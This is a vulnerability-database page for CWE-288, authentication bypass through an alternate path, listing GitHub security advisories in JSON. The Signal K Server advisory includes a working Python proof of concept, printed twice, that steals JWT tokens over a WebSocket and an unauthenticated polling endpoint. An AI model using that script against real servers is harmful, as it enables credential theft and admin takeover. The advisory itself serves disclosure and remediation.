Common Weakness Enumeration

CWE-288

Allowed

Authentication Bypass Using an Alternate Path or Channel

Abstraction: Base · Status: Incomplete

The product requires authentication, but the product has an alternate path or channel that does not require authentication.

1072 vulnerabilities reference this CWE, most recent first.

GHSA-FC83-86WW-F7QW

Vulnerability from github – Published: 2024-06-11 15:31 – Updated: 2024-06-11 15:31
VLAI
Details

An authentication bypass vulnerability exists in the FOXMAN-UN/UNEM server / API Gateway component that if exploited allows attackers without any access to interact with the services and the post-authentication attack surface.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-2013"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-11T14:15:11Z",
    "severity": "CRITICAL"
  },
  "details": "An authentication bypass vulnerability exists in the FOXMAN-UN/UNEM server /\nAPI Gateway component that if exploited allows attackers without \nany access to interact with the services and the post-authentication \nattack surface.",
  "id": "GHSA-fc83-86ww-f7qw",
  "modified": "2024-06-11T15:31:14Z",
  "published": "2024-06-11T15:31:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2013"
    },
    {
      "type": "WEB",
      "url": "https://publisher.hitachienergy.com/preview?DocumentId=8DBD000201\u0026languageCode=en\u0026Preview=true"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FJ3H-M99F-V4Q3

Vulnerability from github – Published: 2025-05-21 18:33 – Updated: 2025-05-21 18:33
VLAI
Details

Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal One Time Password allows Functionality Bypass.This issue affects One Time Password: from 0.0.0 before 1.3.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-48010"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-21T17:15:58Z",
    "severity": "MODERATE"
  },
  "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal One Time Password allows Functionality Bypass.This issue affects One Time Password: from 0.0.0 before 1.3.0.",
  "id": "GHSA-fj3h-m99f-v4q3",
  "modified": "2025-05-21T18:33:31Z",
  "published": "2025-05-21T18:33:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48010"
    },
    {
      "type": "WEB",
      "url": "https://www.drupal.org/sa-contrib-2025-061"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FJ85-459R-FJWQ

Vulnerability from github – Published: 2025-02-09 00:33 – Updated: 2025-02-09 00:33
VLAI
Details

The WP Directorybox Manager plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.5. This is due to incorrect authentication in the 'wp_dp_enquiry_agent_contact_form_submit_callback' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-0316"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-08T22:15:28Z",
    "severity": "CRITICAL"
  },
  "details": "The WP Directorybox Manager plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.5. This is due to incorrect authentication in the \u0027wp_dp_enquiry_agent_contact_form_submit_callback\u0027 function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.",
  "id": "GHSA-fj85-459r-fjwq",
  "modified": "2025-02-09T00:33:42Z",
  "published": "2025-02-09T00:33:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0316"
    },
    {
      "type": "WEB",
      "url": "https://themeforest.net/item/directory-multipurpose-wordpress-theme/10480929"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3ee1f412-7555-4dec-ba59-49412471a42f?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FMGJ-X956-32C7

Vulnerability from github – Published: 2026-03-05 06:30 – Updated: 2026-03-09 15:30
VLAI
Details

Authentication Bypass Using an Alternate Path or Channel vulnerability in designthemes WeDesignTech Ultimate Booking Addon wedesigntech-ultimate-booking-addon allows Authentication Abuse.This issue affects WeDesignTech Ultimate Booking Addon: from n/a through <= 1.0.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-27390"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-05T06:16:28Z",
    "severity": "HIGH"
  },
  "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in designthemes WeDesignTech Ultimate Booking Addon wedesigntech-ultimate-booking-addon allows Authentication Abuse.This issue affects WeDesignTech Ultimate Booking Addon: from n/a through \u003c= 1.0.1.",
  "id": "GHSA-fmgj-x956-32c7",
  "modified": "2026-03-09T15:30:32Z",
  "published": "2026-03-05T06:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27390"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/wedesigntech-ultimate-booking-addon/vulnerability/wordpress-wedesigntech-ultimate-booking-addon-plugin-1-0-1-account-takeover-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FP9M-PHR9-853C

Vulnerability from github – Published: 2025-11-13 03:31 – Updated: 2026-02-06 15:30
VLAI
Details

An authentication bypass vulnerability has been identified in certain DSL series routers, may allow remote attackers to gain unauthorized access into the affected system. Refer to the 'Security Update for DSL Series Router' section on the ASUS Security Advisory for more information.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-59367"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-13T03:16:26Z",
    "severity": "CRITICAL"
  },
  "details": "An authentication bypass vulnerability has been identified in certain DSL series routers, may allow remote attackers to gain unauthorized access into the affected system. Refer to the \u0027Security Update for DSL Series Router\u0027 section on the ASUS Security Advisory for more information.",
  "id": "GHSA-fp9m-phr9-853c",
  "modified": "2026-02-06T15:30:59Z",
  "published": "2025-11-13T03:31:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59367"
    },
    {
      "type": "WEB",
      "url": "https://www.asus.com/security-advisory"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-FPM3-HH7R-9CG9

Vulnerability from github – Published: 2024-07-21 09:30 – Updated: 2024-07-21 09:30
VLAI
Details

D-Link - CWE-288:Authentication Bypass Using an Alternate Path or Channel

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-38437"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-21T08:15:06Z",
    "severity": "CRITICAL"
  },
  "details": "D-Link - CWE-288:Authentication Bypass Using an Alternate Path or Channel",
  "id": "GHSA-fpm3-hh7r-9cg9",
  "modified": "2024-07-21T09:30:32Z",
  "published": "2024-07-21T09:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38437"
    },
    {
      "type": "WEB",
      "url": "https://www.gov.il/en/Departments/faq/cve_advisories"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FQ3G-G86H-MHJV

Vulnerability from github – Published: 2024-10-26 15:30 – Updated: 2024-10-26 15:30
VLAI
Details

The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 3.0.7. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-9501"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-26T13:15:11Z",
    "severity": "CRITICAL"
  },
  "details": "The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 3.0.7. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.",
  "id": "GHSA-fq3g-g86h-mhjv",
  "modified": "2024-10-26T15:30:44Z",
  "published": "2024-10-26T15:30:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9501"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wp-social/tags/3.0.6/inc/admin-create-user.php#L205"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3173675"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a4294f5f-d989-4b97-88ee-4e94f4f7845a?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FQ56-HVG6-WVM5

Vulnerability from github – Published: 2026-01-02 15:28 – Updated: 2026-01-02 15:28
VLAI
Summary
Signal K Server vulnerable to JWT Token Theft via WebSocket Enumeration and Unauthenticated Polling
Details

SignalK Server exposes two features that can be chained together to steal JWT authentication tokens without any prior authentication. The attack combines WebSocket-based request enumeration with unauthenticated polling of access request status.

Unauthenticated WebSocket Request Enumeration: When a WebSocket client connects to the SignalK stream endpoint with the serverevents=all query parameter, the server sends all cached server events including ACCESS_REQUEST events that contain details about pending access requests. The startServerEvents function iterates over app.lastServerEvents and writes each cached event to any connected client without verifying authorization level. Since WebSocket connections are allowed for readonly users (which includes unauthenticated users when allow_readonly is true), attackers receive these events containing request IDs, client identifiers, descriptions, requested permissions, and IP addresses.

Unauthenticated Token Polling: The access request status endpoint at /signalk/v1/access/requests/:id returns the full state of an access request without requiring authentication. When an administrator approves a request, the response includes the issued JWT token in plaintext. The queryRequest function returns the complete request object including the token field, and the REST endpoint uses readonly authentication, allowing unauthenticated access.

An attacker has two paths to exploit these vulnerabilities:

  1. The attacker creates their own access request (using the IP spoofing vulnerability to craft a convincing spoofed request), then polls their own request ID until an administrator approves it, receiving the JWT token.

  2. The attacker passively monitors the WebSocket stream to discover request IDs from legitimate devices, then polls those IDs and steals the JWT tokens when administrators approve them, hijacking legitimate device credentials.

Both paths require zero authentication and enable complete authentication bypass.

Affected Code

File: src/events.ts (lines 40-43)

Object.keys(app.lastServerEvents).forEach((propName) => {
  spark.write(app.lastServerEvents[propName])
})

All cached server events, including ACCESS_REQUEST, are sent to any connected WebSocket client without permission checks.

File: src/tokensecurity.js (lines 946-948)

strategy.getAccessRequestsResponse = () => {
  return filterRequests('accessRequest', 'PENDING')
}

This function returns all pending requests with full details, which is then broadcast as a server event.

File: src/requestResponse.js (lines 108-135)

function createReply(request, state, props) {
  const reply = {
    state: state,
    requestId: request.requestId
  }

  if (request.updateCb) {
    props.forEach((prop) => {
      if (typeof request[prop] !== 'undefined') {
        reply[prop] = request[prop]  // Includes 'token' when approved
      }
    })
  }
  return reply
}

When an access request transitions to COMPLETED state with APPROVED permission, the token is included in the reply object.

File: src/interfaces/rest.js (endpoint registration)

The /signalk/v1/access/requests/:id endpoint uses readonly authentication, allowing unauthenticated access when allow_readonly is true.

Impact

An attacker can obtain any JWT token issued by the server without authentication. By exploiting the social engineering vulnerability to request admin permissions, they receive a fully privileged admin token granting access to all protected endpoints including package installation, effectively bypassing authentication entirely. Additionally, attackers can hijack legitimate device credentials by stealing tokens intended for real devices.

PoC

import json, websocket, requests, time

TARGET_IP, TARGET_PORT = "localhost", 3000
TARGET_WS = f"ws://{TARGET_IP}:{TARGET_PORT}"
TARGET_HTTP = f"http://{TARGET_IP}:{TARGET_PORT}"

def poll_for_token(request_id, href):
    print(f"[*] Polling started for request {request_id}")
    url = f"{TARGET_HTTP}{href}"
    while True:
        try:
            r = requests.get(url)

            if r.status_code == 200:
                data = r.json()
                state = data.get("state")
                print(f"[.] Request {request_id} state: {state}")

                if state == "COMPLETED":
                    access_req = data.get("accessRequest", {})
                    permission = access_req.get("permission")
                    token = access_req.get("token")

                    print(f"[*] Request completed - Permission: {permission}, Token present: {bool(token)}")

                    if token:
                        print(f"[+] TOKEN STOLEN")
                        print(f"[+] Permission: {permission}")
                        print(f"[+] JWT Token: {token}")
                        return token
                    else:
                        print(f"[-] Request {request_id} denied or no token")
                        return None
            else:
                print(f"[-] HTTP {r.status_code} for request {request_id}")

        except Exception as e:
            print(f"[-] Error polling {request_id}: {e}")

        time.sleep(5)

def monitor_and_steal_tokens():
    uri = f"{TARGET_WS}/signalk/v1/stream?serverevents=all"
    print(f"[*] Connecting to {uri}")

    ws = websocket.create_connection(uri)
    print("[+] Connected, monitoring for ACCESS_REQUEST events...")

    while True:
        message = ws.recv()
        msg = json.loads(message)

        if msg.get("type") == "ACCESS_REQUEST":
            print("[+] ACCESS_REQUEST event received!")
            data = msg.get("data", [])

            if data:
                req = data[0]
                request_id = req.get('requestId')
                permissions = req.get('clientRequest', {}).get('permissions')
                href = req.get('href', f'/signalk/v1/requests/{request_id}')

                print(f"[*] Found request: {request_id}")
                print(f"[*] Closing WebSocket and starting polling...")

                ws.close()
                poll_for_token(request_id, href)
                break

if __name__ == "__main__":
    monitor_and_steal_tokens()

Recommendations

  1. Require strict authentication for all WebSocket channels. The serverevents=all parameter should only be accessible to authenticated admin users. Unauthenticated or readonly users should not receive any server events.
  2. Place ACCESS_REQUEST events behind strict authentication. Even if other server events are available to readonly users, access request details must only be sent to authenticated administrators.
  3. Implement client verification so only the original requester can retrieve their token
  4. Consider delivering tokens through a separate secure channel rather than the polling endpoint
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "signalk-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.19.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-68620"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-02T15:28:54Z",
    "nvd_published_at": "2026-01-01T19:15:53Z",
    "severity": "CRITICAL"
  },
  "details": "SignalK Server exposes two features that can be chained together to steal JWT authentication tokens without any prior authentication. The attack combines WebSocket-based request enumeration with unauthenticated polling of access request status.\n\n**Unauthenticated WebSocket Request Enumeration**: When a WebSocket client connects to the SignalK stream endpoint with the `serverevents=all` query parameter, the server sends all cached server events including `ACCESS_REQUEST` events that contain details about pending access requests. The `startServerEvents` function iterates over `app.lastServerEvents` and writes each cached event to any connected client without verifying authorization level. Since WebSocket connections are allowed for readonly users (which includes unauthenticated users when `allow_readonly` is true), attackers receive these events containing request IDs, client identifiers, descriptions, requested permissions, and IP addresses.\n\n**Unauthenticated Token Polling**: The access request status endpoint at `/signalk/v1/access/requests/:id` returns the full state of an access request without requiring authentication. When an administrator approves a request, the response includes the issued JWT token in plaintext. The `queryRequest` function returns the complete request object including the token field, and the REST endpoint uses readonly authentication, allowing unauthenticated access.\n\nAn attacker has two paths to exploit these vulnerabilities:\n\n1. The attacker creates their own access request (using the IP spoofing vulnerability to craft a convincing spoofed request), then polls their own request ID until an administrator approves it, receiving the JWT token.\n\n2. The attacker passively monitors the WebSocket stream to discover request IDs from legitimate devices, then polls those IDs and steals the JWT tokens when administrators approve them, hijacking legitimate device credentials.\n\nBoth paths require zero authentication and enable complete authentication bypass.\n\n### Affected Code\n\n**File**: `src/events.ts` (lines 40-43)\n\n```typescript\nObject.keys(app.lastServerEvents).forEach((propName) =\u003e {\n  spark.write(app.lastServerEvents[propName])\n})\n```\n\nAll cached server events, including `ACCESS_REQUEST`, are sent to any connected WebSocket client without permission checks.\n\n**File**: `src/tokensecurity.js` (lines 946-948)\n\n```javascript\nstrategy.getAccessRequestsResponse = () =\u003e {\n  return filterRequests(\u0027accessRequest\u0027, \u0027PENDING\u0027)\n}\n```\n\nThis function returns all pending requests with full details, which is then broadcast as a server event.\n\n**File**: `src/requestResponse.js` (lines 108-135)\n\n```javascript\nfunction createReply(request, state, props) {\n  const reply = {\n    state: state,\n    requestId: request.requestId\n  }\n\n  if (request.updateCb) {\n    props.forEach((prop) =\u003e {\n      if (typeof request[prop] !== \u0027undefined\u0027) {\n        reply[prop] = request[prop]  // Includes \u0027token\u0027 when approved\n      }\n    })\n  }\n  return reply\n}\n```\n\nWhen an access request transitions to COMPLETED state with APPROVED permission, the token is included in the reply object.\n\n**File**: `src/interfaces/rest.js` (endpoint registration)\n\nThe `/signalk/v1/access/requests/:id` endpoint uses readonly authentication, allowing unauthenticated access when `allow_readonly` is true.\n\n### Impact\n\nAn attacker can obtain any JWT token issued by the server without authentication. By exploiting the social engineering vulnerability to request admin permissions, they receive a fully privileged admin token granting access to all protected endpoints including package installation, effectively bypassing authentication entirely. Additionally, attackers can hijack legitimate device credentials by stealing tokens intended for real devices.\n\n### PoC\n\n```python\nimport json, websocket, requests, time\n\nTARGET_IP, TARGET_PORT = \"localhost\", 3000\nTARGET_WS = f\"ws://{TARGET_IP}:{TARGET_PORT}\"\nTARGET_HTTP = f\"http://{TARGET_IP}:{TARGET_PORT}\"\n\ndef poll_for_token(request_id, href):\n    print(f\"[*] Polling started for request {request_id}\")\n    url = f\"{TARGET_HTTP}{href}\"\n    while True:\n        try:\n            r = requests.get(url)\n            \n            if r.status_code == 200:\n                data = r.json()\n                state = data.get(\"state\")\n                print(f\"[.] Request {request_id} state: {state}\")\n                \n                if state == \"COMPLETED\":\n                    access_req = data.get(\"accessRequest\", {})\n                    permission = access_req.get(\"permission\")\n                    token = access_req.get(\"token\")\n                    \n                    print(f\"[*] Request completed - Permission: {permission}, Token present: {bool(token)}\")\n                    \n                    if token:\n                        print(f\"[+] TOKEN STOLEN\")\n                        print(f\"[+] Permission: {permission}\")\n                        print(f\"[+] JWT Token: {token}\")\n                        return token\n                    else:\n                        print(f\"[-] Request {request_id} denied or no token\")\n                        return None\n            else:\n                print(f\"[-] HTTP {r.status_code} for request {request_id}\")\n                        \n        except Exception as e:\n            print(f\"[-] Error polling {request_id}: {e}\")\n            \n        time.sleep(5)\n\ndef monitor_and_steal_tokens():\n    uri = f\"{TARGET_WS}/signalk/v1/stream?serverevents=all\"\n    print(f\"[*] Connecting to {uri}\")\n    \n    ws = websocket.create_connection(uri)\n    print(\"[+] Connected, monitoring for ACCESS_REQUEST events...\")\n    \n    while True:\n        message = ws.recv()\n        msg = json.loads(message)\n        \n        if msg.get(\"type\") == \"ACCESS_REQUEST\":\n            print(\"[+] ACCESS_REQUEST event received!\")\n            data = msg.get(\"data\", [])\n            \n            if data:\n                req = data[0]\n                request_id = req.get(\u0027requestId\u0027)\n                permissions = req.get(\u0027clientRequest\u0027, {}).get(\u0027permissions\u0027)\n                href = req.get(\u0027href\u0027, f\u0027/signalk/v1/requests/{request_id}\u0027)\n                \n                print(f\"[*] Found request: {request_id}\")\n                print(f\"[*] Closing WebSocket and starting polling...\")\n                \n                ws.close()\n                poll_for_token(request_id, href)\n                break\n\nif __name__ == \"__main__\":\n    monitor_and_steal_tokens()\n```\n\n### Recommendations\n\n1. Require strict authentication for all WebSocket channels. The `serverevents=all` parameter should only be accessible to authenticated admin users. Unauthenticated or readonly users should not receive any server events.\n2. Place `ACCESS_REQUEST` events behind strict authentication. Even if other server events are available to readonly users, access request details must only be sent to authenticated administrators.\n3. Implement client verification so only the original requester can retrieve their token\n4. Consider delivering tokens through a separate secure channel rather than the polling endpoint",
  "id": "GHSA-fq56-hvg6-wvm5",
  "modified": "2026-01-02T15:28:55Z",
  "published": "2026-01-02T15:28:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-fq56-hvg6-wvm5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68620"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/commit/221aff6cd89c56308084d1781b3abbf938605bd3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/SignalK/signalk-server"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Signal K Server vulnerable to JWT Token Theft via WebSocket Enumeration and Unauthenticated Polling"
}

GHSA-FQPP-WF47-38VW

Vulnerability from github – Published: 2022-06-08 00:00 – Updated: 2022-06-17 00:01
VLAI
Details

A vulnerability in the application authentication and authorization mechanism in Hitachi Energy's TXpert Hub CoreTec 4, that depends on a token validation of the session identifier, allows an unauthorized modified message to be executed in the server enabling an unauthorized actor to change an existing user password, and further gain authorized access into the system via login mechanism. This issue affects: Hitachi Energy TXpert Hub CoreTec 4 version 2.0.0 2.1.0; 2.1.0; 2.1.1; 2.1.2; 2.1.3; 2.2.0; 2.2.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-35530"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-06-07T21:15:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the application authentication and authorization mechanism in Hitachi Energy\u0027s TXpert Hub CoreTec 4, that depends on a token validation of the session identifier, allows an unauthorized modified message to be executed in the server enabling an unauthorized actor to change an existing user password, and further gain authorized access into the system via login mechanism. This issue affects: Hitachi Energy TXpert Hub CoreTec 4 version 2.0.0 2.1.0; 2.1.0; 2.1.1; 2.1.2; 2.1.3; 2.2.0; 2.2.1.",
  "id": "GHSA-fqpp-wf47-38vw",
  "modified": "2022-06-17T00:01:28Z",
  "published": "2022-06-08T00:00:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35530"
    },
    {
      "type": "WEB",
      "url": "https://search.abb.com/library/Download.aspx?DocumentID=8DBD000080\u0026LanguageCode=en\u0026DocumentPartId=\u0026Action=Launch\u0026utm_campaign=\u0026utm_content=2022.04_5763_Cybersecurity%20Advisory%20Update_May_03\u0026utm_medium=email\u0026utm_source=Eloqua"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FQVV-MH7W-3JQ3

Vulnerability from github – Published: 2024-12-21 15:30 – Updated: 2025-11-04 00:32
VLAI
Details

IBM i 7.3, 7.4, and 7.5 is vulnerable to bypassing Navigator for i interface restrictions. By sending a specially crafted request, an authenticated attacker could exploit this vulnerability to remotely perform operations that the user is not allowed to perform when using Navigator for i.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-51464"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-644"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-12-21T14:15:21Z",
    "severity": "MODERATE"
  },
  "details": "IBM i 7.3, 7.4, and 7.5 is vulnerable to bypassing Navigator for i interface restrictions.  By sending a specially crafted request, an authenticated attacker could exploit this vulnerability to remotely perform operations that the user is not allowed to perform when using Navigator for i.",
  "id": "GHSA-fqvv-mh7w-3jq3",
  "modified": "2025-11-04T00:32:15Z",
  "published": "2024-12-21T15:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51464"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7179509"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2024/Dec/19"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2024/Dec/20"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Funnel all access through a single choke point to simplify how users can access a resource. For every access, perform a check to determine if the user has permissions to access the resource.

CAPEC-127: Directory Indexing

An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.